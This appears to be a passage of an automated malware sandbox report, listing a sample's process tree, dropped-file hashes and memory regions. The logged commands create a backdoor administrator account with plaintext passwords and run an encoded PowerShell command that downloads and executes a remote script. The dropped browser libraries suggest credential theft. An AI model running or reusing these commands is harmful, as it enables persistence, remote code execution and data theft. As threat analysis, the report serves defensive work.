C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc YY6epZcX1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc YY6epZcX2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc YY6epZcX3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
4d0cb7fa714bb6b8b113319c5f37734d
SHA178fb1052d8fa35592e0f6103378658478c8d1385
SHA256469199f341db97de914a24f626d2f1ea8fe116bd6302bb10e53a027e759e7845
SHA512b2e7d6f724990ea57448429f159c713b2885354c709e206a97126b470e9705143e2695a3bd73ee3f55a160f2807f4ac215dca9df0da209bf88503069d52cd76c
-
C:\Users\Admin\AppData\Local\Temp\RES5C2F.tmpMD5
808d4835ac2f1eed5110cd8075fae0c8
SHA164a390bc64de46386de84171457e1da332961c0a
SHA256085c1b4d0e74503dec368a1316a347eb2d09939f5145f6e2ac37f13b1f18bcdc
SHA512f3185414b53ee87dd5a1b0a649ba98efc51d323f2a357af731b7cd43324c41cd5f7ea0733ec2e8dc52e3998ff9ee03d9b54b306af52d6fb3276b972a72e24b9d
-
C:\Users\Admin\AppData\Local\Temp\amutdoir\amutdoir.dllMD5
e43ec486e37ef34cfd068115ac4b1c98
SHA1ba413336a96aa234839efe2ca5847f0f93df9e33
SHA25633a9e88871fa41d0f389321af3aeb16677672f19f1afda3d661f9a838da44c7f
SHA5127ac6bad0304db29120c2639fada47ab492defdeaeea82ca611939be5c2087a3178574017f901f53c8c684644d46a07b5e620a3fa73e50067ba13e9966149d023
-
C:\Users\Admin\AppData\Local\Temp\gYmsQZhOxV.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\gYmsQZhOxV.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
065cc96fec70546c9f195f703e4d657b
SHA19da24636d8fd3de61f46ff7282640d3fa27d6b45
SHA256cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3
SHA512a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0
-
\??\c:\Users\Admin\AppData\Local\Temp\amutdoir\CSC4AE3CED5DC0C4D95A76C66B041D5143E.TMPMD5
cad430fb7564c2394ef083daba0ebc7b
SHA1de3a93df7b04a2245d2ebed9fd6329e1385aa637
SHA2569d0c72b582b691b16466bf6f389a8a80f618b40bed22a36b8e15c08a8f964b6d
SHA512463e92c41b2f0776c04ad1e61ce1740610a2ff0c9bf0d18a4e7d40dd16e5fd446e3248c293b79d6f8d1ea78028cbd070bf7176099cc1aa0b9c083cf11fcc58d4
-
\??\c:\Users\Admin\AppData\Local\Temp\amutdoir\amutdoir.0.csMD5
df390bc8a088b51d27253fed32186361
SHA169e6a59300fc04ef5ab53cbe061b8b2aefe375a4
SHA2564388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f
SHA5124d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8
-
\??\c:\Users\Admin\AppData\Local\Temp\amutdoir\amutdoir.cmdlineMD5
ff076e885c801d171be2c299f9938c6a
SHA13b7e29eef6ac0365b0722cbe99a22bbdc7a12aa1
SHA256904a8f931ab052371cd93866cdbbbf5020db10f293db7e3eb20481fa1ff9c4a2
SHA51247cced49850a15718ccdfa97c0cb4b966f68d944464adf4e5127156d0e7320742320e7ecfe22395a5f8be61f473b61c23c91754428d487ac5f48e99d35d189a7
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dllMD5
eae9273f8cdcf9321c6c37c244773139
SHA18378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA51206e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dllMD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1a6923da95705fb81e368ae48f93d28522ef552fb
SHA2561989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA5120d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dllMD5
4e8df049f3459fa94ab6ad387f3561ac
SHA106ed392bc29ad9d5fc05ee254c2625fd65925114
SHA25625a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA5123dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.pngMD5
ee8186ae8d2615ee4a859007556227ec
SHA10125a0caaf2ff3da1266f1893cf051ddca6460fa
SHA25696de9d90945d198cd5aed4a446e464ba13e2e4e92d3649a396825864a0fcd17f
SHA5122eebacfc81b1c974583c41f44b7726e8280098d1f371db7d7038d24bdf3724093f1fe1c0c7eff5e8d9053cd98add7882734ea0746c8b20621e67e1b06442d612
-
\Windows\Branding\mediasvc.pngMD5
7a8bf878d6438e28822cb499cb7da107
SHA136cbc7c1b2da094b773614d251704e4c2bb0e88e
SHA2569aae34a03f16047b5e795b0dcd9b717f87c54355a9928889f629f3bb06bd7e63
SHA5126c19a44f8c4251cd14c35862108a4fed4875386a5eec9763ce78679beedc0bd157560eb5a3b11209a5b4336b923133a6bf9f8f657f116744077967d6af6654ee
-
memory/204-251-0x0000000000000000-mapping.dmp
-
memory/932-235-0x0000000000000000-mapping.dmp
-
memory/1128-232-0x0000000000000000-mapping.dmp
-
memory/1240-228-0x0000000000000000-mapping.dmp
-
memory/1464-246-0x0000000000000000-mapping.dmp
-
memory/1564-242-0x0000000000000000-mapping.dmp
-
memory/1648-154-0x0000000000000000-mapping.dmp
-
memory/1772-256-0x000002B6677E3000-0x000002B6677E5000-memory.dmpFilesize
8KB
-
memory/1772-225-0x0000000000000000-mapping.dmp
-
memory/1772-254-0x0000000000000000-mapping.dmp
-
memory/1772-255-0x000002B6677E0000-0x000002B6677E2000-memory.dmpFilesize
8KB
-
memory/1772-257-0x000002B6677E6000-0x000002B6677E8000-memory.dmpFilesize
8KB
-
memory/1772-258-0x000002B6677E8000-0x000002B6677E9000-memory.dmpFilesize
4KB
-
memory/1812-241-0x0000000000000000-mapping.dmp
-
memory/1832-245-0x0000000000000000-mapping.dmp
-
memory/2004-221-0x000001CCB8166000-0x000001CCB8168000-memory.dmpFilesize
8KB
-
memory/2004-222-0x000001CCB8168000-0x000001CCB816A000-memory.dmpFilesize
8KB
-
memory/2004-220-0x000001CCB8163000-0x000001CCB8165000-memory.dmpFilesize
8KB
-
memory/2004-217-0x0000000000000000-mapping.dmp
-
memory/2004-219-0x000001CCB8160000-0x000001CCB8162000-memory.dmpFilesize
8KB
-
memory/2124-236-0x0000000000000000-mapping.dmp
-
memory/2164-227-0x0000000000000000-mapping.dmp
-
memory/2192-252-0x0000000000000000-mapping.dmp
-
memory/2196-233-0x0000000000000000-mapping.dmp
-
memory/2196-261-0x0000000000000000-mapping.dmp
-
memory/2248-215-0x00000250DAE53000-0x00000250DAE55000-memory.dmpFilesize
8KB
-
memory/2248-216-0x00000250DAE56000-0x00000250DAE58000-memory.dmpFilesize
8KB
-
memory/2248-214-0x00000250DAE50000-0x00000250DAE52000-memory.dmpFilesize
8KB
-
memory/2248-213-0x0000000000000000-mapping.dmp
-
memory/2248-218-0x00000250DAE58000-0x00000250DAE5A000-memory.dmpFilesize
8KB
-
memory/2248-239-0x0000000000000000-mapping.dmp
-
memory/2352-247-0x0000000000000000-mapping.dmp
-
memory/2720-250-0x0000000000000000-mapping.dmp
-
memory/2720-124-0x0000000000000000-mapping.dmp
-
memory/2740-229-0x0000000000000000-mapping.dmp
-
memory/2740-244-0x0000000000000000-mapping.dmp
-
memory/2828-234-0x0000000000000000-mapping.dmp
-
memory/2928-240-0x0000000000000000-mapping.dmp
-
memory/3144-248-0x0000000000000000-mapping.dmp
-
memory/3144-226-0x0000000000000000-mapping.dmp
-
memory/3148-173-0x0000000000000000-mapping.dmp
-
memory/3148-212-0x000001A09B158000-0x000001A09B15A000-memory.dmpFilesize
8KB
-
memory/3148-211-0x000001A09B156000-0x000001A09B158000-memory.dmpFilesize
8KB
-
memory/3148-184-0x000001A09B153000-0x000001A09B155000-memory.dmpFilesize
8KB
-
memory/3148-183-0x000001A09B150000-0x000001A09B152000-memory.dmpFilesize
8KB
-
memory/3208-230-0x0000000000000000-mapping.dmp
-
memory/3260-224-0x0000000000000000-mapping.dmp
-
memory/3508-151-0x0000000000000000-mapping.dmp
-
memory/3692-259-0x0000000000000000-mapping.dmp
-
memory/3728-253-0x0000000000000000-mapping.dmp
-
memory/3784-262-0x0000000000000000-mapping.dmp
-
memory/3808-223-0x0000021A48968000-0x0000021A48969000-memory.dmpFilesize
4KB
-
memory/3808-158-0x0000021A48930000-0x0000021A48931000-memory.dmpFilesize
4KB
-
memory/3808-138-0x0000021A488F0000-0x0000021A488F1000-memory.dmpFilesize
4KB
-
memory/3808-144-0x0000021A48960000-0x0000021A48962000-memory.dmpFilesize
8KB
-
memory/3808-166-0x0000021A49D80000-0x0000021A49D81000-memory.dmpFilesize
4KB
-
memory/3808-133-0x0000000000000000-mapping.dmp
-
memory/3808-160-0x0000021A48966000-0x0000021A48968000-memory.dmpFilesize
8KB
-
memory/3808-145-0x0000021A48963000-0x0000021A48965000-memory.dmpFilesize
8KB
-
memory/3808-165-0x0000021A499F0000-0x0000021A499F1000-memory.dmpFilesize
4KB
-
memory/3808-142-0x0000021A49590000-0x0000021A49591000-memory.dmpFilesize
4KB
-
memory/3848-231-0x0000000000000000-mapping.dmp
-
memory/3952-114-0x0000000002280000-0x0000000002311000-memory.dmpFilesize
580KB
-
memory/3952-115-0x0000000000400000-0x0000000000496000-memory.dmpFilesize
600KB
-
memory/3956-243-0x0000000000000000-mapping.dmp
-
memory/3956-126-0x0000000000000000-mapping.dmp
-
memory/3968-249-0x0000000000000000-mapping.dmp
-
memory/3972-260-0x0000000000000000-mapping.dmp
-
memory/4092-132-0x000001C2FE786000-0x000001C2FE787000-memory.dmpFilesize
4KB
-
memory/4092-122-0x0000000000000000-mapping.dmp
-
memory/4092-127-0x000001C2FEBC0000-0x000001C2FEFE1000-memory.dmpFilesize
4.1MB
-
memory/4092-129-0x000001C2FE780000-0x000001C2FE782000-memory.dmpFilesize
8KB
-
memory/4092-130-0x000001C2FE783000-0x000001C2FE785000-memory.dmpFilesize
8KB
-
memory/4092-131-0x000001C2FE785000-0x000001C2FE786000-memory.dmpFilesize
4KB